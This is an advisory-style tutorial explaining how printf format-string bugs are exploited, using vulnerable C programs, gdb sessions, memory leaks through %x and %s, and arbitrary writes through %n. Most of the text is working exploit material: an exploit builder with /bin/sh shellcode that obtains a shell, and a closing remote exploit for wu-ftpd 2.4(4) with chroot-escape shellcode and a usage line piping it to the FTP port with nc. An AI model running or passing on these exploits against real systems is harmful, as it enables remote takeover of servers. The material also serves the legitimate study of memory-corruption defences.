COMMAND
Format bugs
SYSTEMS AFFECTED
Most systems
PROBLEM
Pascal Bouchareine posted the following. This paper tries to explain
how to exploit a printf(userinput) format bug, as reported in some
advisories. The approach is elementary and, more precisely, does not
take into account any existing exploit (wu-ftpd, ...).
A general knowledge of C programming and assembler is assumed
throughout this article (stack issues, registers, endian storage).
Let's begin with an experiment. Have a look at the following code:
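#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    char tmp[512];
    char buf[512];
    while(1) {
        memset(buf, '\0', 512);
        read(0, buf, 512);
        sprintf(tmp, buf);   /* BUG: user input is used as the format string */
        printf("%s", tmp);
    }
}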
It allocates stack space for tmp and buf (buf having the lower
address on the stack), reads user input into buf, calls sprintf to
fill tmp and prints out tmp. Let's try it:
[pb@camel][formats]> ./t
foo-bar
foo-bar
%x %x %x %x
25207825 78252078 a782520 0
Clumsy coders are used to seeing this kind of thing, but let's see
exactly what happens.
When sprintf encounters a conversion specifier, it simply takes the
next word (32 bits, 4 bytes on Intel) from the place on the stack
where its arguments would have been pushed and, in the case of the
"%x" converter, writes it out as hexadecimal.
If arguments are explicitly given, it works well, but if they are
missing, sprintf has no arguments of its own to consume and reads
straight into the caller's stack, provided that the stack grows
downward (Intel architecture in the example). For more details,
let's look at this second example:
[pb@camel][formats]> gdb ./t
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
(gdb) break sprintf
Breakpoint 1 at 0x80481f3
(gdb) run
Starting program: /usr/home/pb/code/format/./t
%x
Breakpoint 1, 0x80481f3 in _IO_sprintf ()
(gdb) x/20x $esp
0xbffff670: 0xbffffa80 0x080481af 0xbffff880 0xbffff680
0xbffff680: 0x000a7825 0x00000000 0x00000000 0x00000000
0xbffff690: 0x00000000 0x00000000 0x00000000 0x00000000
* 0xbffffa80 and 0x080481af are a plain stack frame footer
* 0xbffffa80 is the calling function's stack frame address
* 0x080481af is the return address in main().
Then there are two arguments for sprintf:
* 0xbffff880 is tmp[]'s address
* 0xbffff680 is buf[]'s address
Look at what comes just after this, at address 0xbffff680.
Yep, this is the beginning of main's stack frame, with the 0x400
bytes allocated for tmp[] and buf[], which hold what has been
entered as input:
0x000a7825 (little endian: %x\n).
Let's look at the first example again:
[pb@camel][formats]> ./t
%x %x %x %x
25207825 78252078 a782520 0
The %x converter makes sprintf hit a part of the stack where you
have:
"\x25\x78\x20\x25....\x78\x0a\x00\x00\x00\x00"
This is buf[]'s content, with the 0 terminating byte [a word in
this case].
Let's study it in more detail, adding a function named do_it with
a 4-byte local variable holding 0x04030201, and let's see what
happens when sprintf(dst, "%x") is called from it:
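#include <stdio.h>
#include <string.h>
#include <unistd.h>

void do_it(char *d, char *s)
{
    char buf[] = "\x01\x02\x03\x04";   /* marker bytes on do_it's stack */
    sprintf(d, s);                     /* BUG: s is used as the format string */
}

int main(void)
{
    char tmp[512];
    char buf[512];
    while(1) {
        memset(buf, '\0', 512);
        read(0, buf, 512);
        do_it(tmp, buf);
        printf("%s", tmp);
    }
}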
Of course, sprintf is expected to hit do_it()'s buf[] word, using
%#010x as format converter:
[pb@camel][formats]> ./t
%#010x
0x04030201
So one has access to do_it()'s stack contents, and can guess
main()'s stack frame address, and do_it's return address with
ease:
[pb@camel][formats]> ./t
%#010x %x %x %x
0x04030201 bffffa00 bffffac0 80485af
Let's suppose the second word (0xbffffa00) is space allocated for
pushing sprintf's arguments; 0xbffffac0 and 0x080485af, however,
really are the saved ebp and the return address:
(gdb) bt
#0 0x8048526 in do_it ()
#1 0x80485af in main ()
(gdb) x/2x $ebp
0xbffff6b0: 0xbffffac0 0x080485af
So one easily gets access to the calling function's stack frame
address.
In this example, you can easily guess, remotely, the location of a
return address to overwrite (main's, for example) AND the address
of the eggshell (if any). The return address is found by adding
0x04 to the caller's saved $ebp (the second element of this
($ebp, ret) pair is at 0xbffffac0 + 0x04 == 0xbffffac4):
(gdb) x 0xbffffac4
0xbffffac4: 0x080484be
(gdb) bt
#0 0x8048526 in do_it ()
#1 0x80485af in main ()
#2 0x80484be in ___crt_dummy__ ()
So main's return address (#2) is in ___crt_dummy__ for the time
being, but can be changed to anything you want if you can
overwrite the contents of 0xbffffac4...
As for the eggshell address, there are many ways to guess it. The
simplest way is to find buf[]'s address, which is [bottom of
main's stack] - 0x200 + some stack-allocated data:
(gdb) break memset
Breakpoint 1 at 0x8048408
(gdb) c
Continuing.
%#010x %x %x %x
0x04030201 bffffa00 bffffa20 80485af
Breakpoint 1, 0x40078428 in memset ()
(gdb) printf "%s\n", 0xbffffa00 - 0x200 + 0x20
%#010x %x %x %x
Although this depends heavily on the program you are running, you
can see that finding a writable return address on the stack and an
executable eggshell on the stack is quite easy.
However, the best way to guess stack architecture remotely, when
one has no access to the running process, is to "eat" the stack
with many "%x" or "%...s" format converters until a [stack
address, code segment address] pair is found and the user input
string itself is dumped.
Eating stack space with "junk" format converters until the
beginning of input string is found is a really nice way to control
what happens next: you now have controllable arguments to "%*"
format converters, and this really, really comes in handy. Have
a look at this (using the first example):
[pb@camel][formats]> ./t
AAAA%x
AAAA41414141
Remember, sprintf received no arguments after the format string.
The %x converter makes sprintf take the beginning of the input
buffer as the argument list for the format string.
One has *many* ways to play around with this.
This "let me control the stack" feature is your friend just as gdb
is. You can dump the whole stack, guess stack addresses, and even
write to it (as will be explained later using %n converter).
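Let's look at this example:
#include <stdio.h>
#include <string.h>
#include <unistd.h>

static char find_me[] = "..Buffer was lost in memory\n";

int main(void)
{
    char buf[512];
    char tmp[512];
    while(1) {
        memset(buf, '\0', 512);
        read(0, buf, 512);
        sprintf(tmp, buf);   /* BUG: user input is used as the format string */
        printf("%s", tmp);
    }
}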
The goal is to print the string find_me[]. In this simple example,
you don't have to search (with dummy %x converters) for how many
bytes of stack you need to "eat" before you hit the input buffer:
it is reached by the very first converter (the example with
"AAAA%x" showed it quite clearly). So you basically just have to
issue the following "pseudo string" to print out the buffer:
[4 bytes address of find_me]%s
Yes! It is *that* simple: in this case, the input buffer is both
the format string AND the format string's argument.
Let's do it simply:
[pb@camel][formats]> printf "\x02\x96\x04\x08%s\n" | ./v
(garbage)Buffer was lost in memory
The garbage is the beginning of the format string. So, you are
able to dump any part of memory you need to. What was true of
remote buffer overflows no longer holds: you don't NEED to guess
the return address anymore, since you can inspect memory to find
it. (Er, this is true with printf() issues, but not when you can't
see what the input produced. See setproctitle() for example.)
Then comes the second (and more fun) part.
All that wouldn't be much fun if we didn't have the "%n" format
converter. This one takes an (int *) argument, and writes the
number of bytes written *so far* to that location.
Let's try this (with the very-simple-AAAA%x proggy again):
[pb@camel][formats]> printf "\x70\xf7\xff\xbf%%n\n" > file
[pb@camel][formats]> gdb ./t
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
(no debugging symbols found)...
(gdb) set args < file
(gdb) break main
Breakpoint 1 at 0x8048529
(gdb) run
Starting program: /usr/home/pb/code/format/./t < file
(no debugging symbols found)...
Breakpoint 1, 0x8048529 in main ()
(gdb) watch *0xbffff770
Hardware watchpoint 2: *3221223280
(gdb) c
Continuing.
Hardware watchpoint 2: *3221223280
Old value = 0
New value = 4
0x400323f3 in vfprintf ()
(gdb) x 0xbffff770
0xbffff770: 0x00000004
This time, the 4 bytes encoded at the start of the format string
(an address) are written out, and the "%n" converter made sprintf
store that count where it was told to (i.e. 0xbffff770).
Let's play with this a little more. This time, the generated-file
looks like this:
printf "\x70\xf7\xff\xbf\x71\xf7\xff\xbf%%n%%n" > file
After two watchpoint hits, at 0xbffff770 you have:
(gdb) x 0xbffff770
0xbffff770: 0x00000808
sprintf wrote 8 bytes (two addresses), and each "%n" made it store
this count, first at 0xbffff770 and then at 0xbffff771.
Now, suppose you have an eggshell at 0xbffff710, and the guessed
return address lies at 0xbffffa80. You can't afford to write
0xbffff710 bytes into the buffer to make sprintf (through the "%n"
converter) write this value on the stack. (Remember, people are
usually afraid of buffer overflows and therefore limit the size of
their input buffers.)
But you can use a byte-per-byte construction to build the address.
Since "%n" makes sprintf write the number of bytes written so far
on the stack, you need to subtract the number of bytes already
written from the length of each following fragment.
Since each (int *) write would erase bytes already written above
it, you have to write the address from the least significant byte
to the most significant byte.
Since you need to have written 0xff bytes before you can write the
0xbf byte and, moreover, you can only *increment* the internal
number-of-written-bytes counter, you have to use 0x1bf, erasing a
meaningless byte on the stack.
Note that you could use the "%hn" converter, and make sprintf
write short int values to the stack. But this won't be
discussed here. Here is the "address builder" code explained so
far:
main()
{
char b1[255];
char b2[255];
char b3[255];
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b1, '\x90', 0xf7 - 0x10);
memset(b2, '\x90', 0xff - 0xf7);
memset(b3, '\x90', 0x01bf - 0xff);
printf("\x80\xfa\xff\xbf" // arguments to the "%n" converter.
"\x81\xfa\xff\xbf" // ditto
"\x82\xfa\xff\xbf" // ..
"\x83\xfa\xff\xbf" // last byte.
"%%n" // 1) gives 0x10 ( 16 first bytes )
"%s%%n" // 2) gives 0xf7: string len is 0xf7 - 0x10
"%s%%n" // 3) gives 0xff: string len is 0xff - 0xf7
"%s%%n" // 4) gives 0x01bf: string len is 0x01bf - 0xff
,b1, b2, b3);
// you now have 0xbffff710 at 0xbffffa80
}
Let's try it:
(after 3 hits on watchpoint)
(gdb) c
Continuing.
Hardware watchpoint 3: *3221224064
Old value = 16774928
New value = -1073744112
0x400323f3 in vfprintf ()
(gdb) x/2 0xbffffa80
0xbffffa80: 0xbffff710 0xbf000001
It seems to work quite well. The work is almost finished now: you
just have to push an eggshell after all this format trickery, and
make the program jump back into it. Let's try to apply everything
said before, with the following vulnerable program:
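#include <stdio.h>
#include <string.h>
#include <unistd.h>

void do_it(char *dst, char *src)
{
    int foo;
    char bar;
    sprintf(dst, src);   /* BUG: src is used as the format string */
}

int main(void)
{
    char buf[512];
    char tmp[512];
    memset(buf, '\0', 512);
    read(0, buf, 512);
    do_it(tmp, buf);
    printf("%s", tmp);
}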
1) First you have to find where your input buffer is, to control
the format string.
[pb@camel][formats]> gcc vuln.c -o v
[pb@camel][formats]> ./v
AAAA %x %c %x
AAAA 0 À bffffac0
(int foo, char bar, stack)
...
AAAA %x %x %x %x %x %x %x %x %x
AAAA 0 bffffac0 bffffac0 804859f bffff6c0 bffff8c0 41414141 62203020 66666666
(the *output* buffer is at offset 28)
Look at the stack frame, which is a (stack addr, code addr) pair:
the return address in main is 0x0804859f, main's stack saved ebp
and ret addr begins at 0xbffffac0.
You now know that main's return address is at 0xbffffac4 (the
second part of the [stack, code] pair is of course at pair + 4).
Then you get some information about main's return address:
printf "AAAA\xc0\xfa\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n" | ./v | hexdump
0000000 4141 4141 fac0 bfff 6230 6666 6666 6361
0000010 6230 6666 6666 6361 3830 3430 3538 3838
0000020 6662 6666 3666 3063 6662 6666 3866 3063
0000030 3134 3134 3134 3134 7720 2065 7274 2079
0000040 fad4 bfff 84be 0804 0a01 000a
stack/ret is 0xbffffad4/0x080484be (check this with gdb).
Supposing do_it's frame is something like 0x400 bytes before
main's frame (in fact, it is 0x410 bytes), you can find do_it's
stack frame address, since you know that there must be main's
saved frame pointer followed by a code segment return address,
then by main's stack.
After a lot of tries you have:
printf "AAAA\xb0\xf6\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n" | ./v | hexdump
0000000 4141 4141 f6b0 bfff 6230 6666 6666 6361
0000010 6230 6666 6666 6361 3830 3430 3538 3838
0000020 6662 6666 3666 3063 6662 6666 3866 3063
0000030 3134 3134 3134 3134 7720 2065 7274 2079
0000040 fac0 bfff 8588 0804 f6c0 bfff f8c0 bfff
0000050 4141 4141 f6b0 bfff 6230 6666 6666 6361
0000060 6230 6666 6666 6361 3830 3430 3538 3838
0000070 6662 6666 3666 3063 6662 6666 3866 3063
0000080 3134 3134 3134 3134 7720 2065 7274 2079
0000090 0a0a
(This prints "..we try [contents of 0xbffff6b0]".) Bingo! There
you have ("we try " ends just before offset 0x40)
0xbffffac0, 0x08048588 at 0xbffff6b0.
Remember the (stack, code) pair addresses? This is in fact do_it's
stack frame. You can see sprintf's args just after: 0xbffff6c0
and 0xbffff8c0. These are addresses of the two buffers.
0x41414141 is the beginning of the input buffer, so you can see
that hexdump's offset 0x50 is at address 0xbffff6c0, and since
you are good at math, you confirm that hexdump's offset 0x40 is
indeed at 0xbffff6b0.
This process lets you remotely guess
1) stack return address,
2) buffer address.
You have all the information you need to format the stack, so
let's get to the next step: build the eggshell & the appropriate
buffer.
The buffer will lie at 0xbffff8c0. BUT, since it is filled with
lots of illegal instructions (i.e. the format converters), each
"\x90" string must end with a "\xeb\x02" to jump over the "%n"
format converter that follows it. Therefore, you need not worry
about the exact egg address.
So all you need to do is to push 4 addresses (one address per byte
of the return address to overwrite), a series of "%x" converters
to "eat" stack space, then a series of nops followed by a "%n"
converter (in order to build the return address) and somewhere
the eggshell.
Though this is not the easiest part, a little brain boost (coffee,
cocaine, coca-cola(tm), anything you like) leads to:
void main()
{
char b1[255];
char b2[255];
char b3[255];
char b4[255];
char xx[600];
int i;
char egg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
// ( (void (*)()) egg)();
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b4, 0, 255);
memset(xx, 0, 513);
for (i = 0; i < 12 ; i += 2) { /* setup the 6 "%x" to eat stack space */
strcpy(&xx[i], "%x");
}
memset(b1, '\x90', 0xd0 - 16 - 12 - 2 - 28);
// 16 (4 addresses)
// 2 (%n)
// 40 (%x output - "guess it..")
// use nice formats for
// fixed output size... :)
// + 200- (4 bytes)
memset(b2, '\x90', 0xf8 - 0xd0 - 2); // first 0x90 string is at
// 0xbffff8d0.. (c0 + 4 * 4 bytes) :)
// -2 because of "\xeb\x02"
memset(b3, '\x90', 0xff - 0xf8 - 2); // ditto, with -2.
memset(b4, '\x90', 0x01bf - 0xff - 2); // ditto.
printf("\xb4\xf6\xff\xbf" //
"\xb5\xf6\xff\xbf" // this points to do_it's
"\xb6\xf6\xff\xbf" // return address storage word.
"\xb7\xf6\xff\xbf" //
"%s" // 0) there are 6 "%x", to eat stack until the input buf
// begins to control the format strings.
"%s\xeb\x02%%n" // 1) gives 0xd0 (4 * 4 bytes add, %x are ignored )
"%s\xeb\x02%%n" // 2) gives 0xf9
"%s\xeb\x02%%n" // 3) gives 0xff
"%s\xeb\x02%%n%s" // 4) gives 0x01bf
, xx, b1, b2, b3, b4, egg);
}
Let's give it a final try:
[pb@camel][formats]> ( ./b ; cat ) | ./v
id
uid=1001(pb) gid=100(users) groups=100(users)
date
Sat Jul 15 22:15:07 CEST 2000
These format bugs are really nasty. First, if you can read the
output of the final buffer (e.g. printf(userinput)), you obviously
have control over the computer processing it. You have some kind
of remote-debugger access to the machine, which allows you to get
in at the first try. This is bad news for developers (the wu-ftpd
format bug, used by an aware person, is a one-try remote root).
Playing around with format args and pointers allows us to construct
some kind of "generic format string" that will *certainly*
overwrite the caller's return address. This must be coupled
with a remote return address guess to work properly, but gives
*at least* the same success rate as remote buffer overruns. Even if
you don't see what you do (setproctitle), this is still an easy
way to get in.
This is what Pascal built against his old wu-ftpd [wu-2.4(4)]
using the above technique. It worked, but he had to cut his
input format string to 512 bytes: he placed the eggshell in
another part of memory, using the PASS command. This address is
still easy to guess.
/*
* Sample example - part 2: wu-ftpd v2.4(4), exploitation.
*
* usage:
* 1) find the right address location/eggshell location
* this is easy with a little play around %s and hexdump.
* Then, fix this exploit.
*
* 2) (echo "user ftp"; ./exploit; cat) | nc host 21
*
* echo ^[c to clear your screen if needed.
*
* Don't forget 0xff must be escaped with 0xff.
*
*
*/
main()
{
char b1[255];
char b2[255];
char b3[255];
char b4[255];
char xx[600];
int i;
char egg[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80"
"\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
// ( (void (*)()) egg)();
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b4, 0, 255);
memset(xx, 0, 513);
for (i = 0; i < 20 ; i += 2) { /* set up the 10 "%x" to eat stack space */
strcpy(&xx[i], "%x");
}
memset(b1, '\x90', 0xa3 - 0x50);
memset(b2, '\x90', 0xfe - 0xa3 - 2);
memset(b3, '\x90', 0xff - 0xfe);
memset(b4, '\x90', 0x01bf - 0xff); // build ret address here.
// i found 0xbffffea3
printf("pass %s@oonanism.com\n", egg);
printf("site exec .."
"\x64\xf9\xff\xff\xbf" // insert ret location there.
"\x65\xf9\xff\xff\xbf" // i had 0xbffff964
"\x66\xf9\xff\xff\xbf"
"\x67\xf9\xff\xff\xbf"
"%s"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s%%n"
"%s%%n\n"
, xx, b1, b2, b3, b4);
}
SOLUTION
Nothing yet.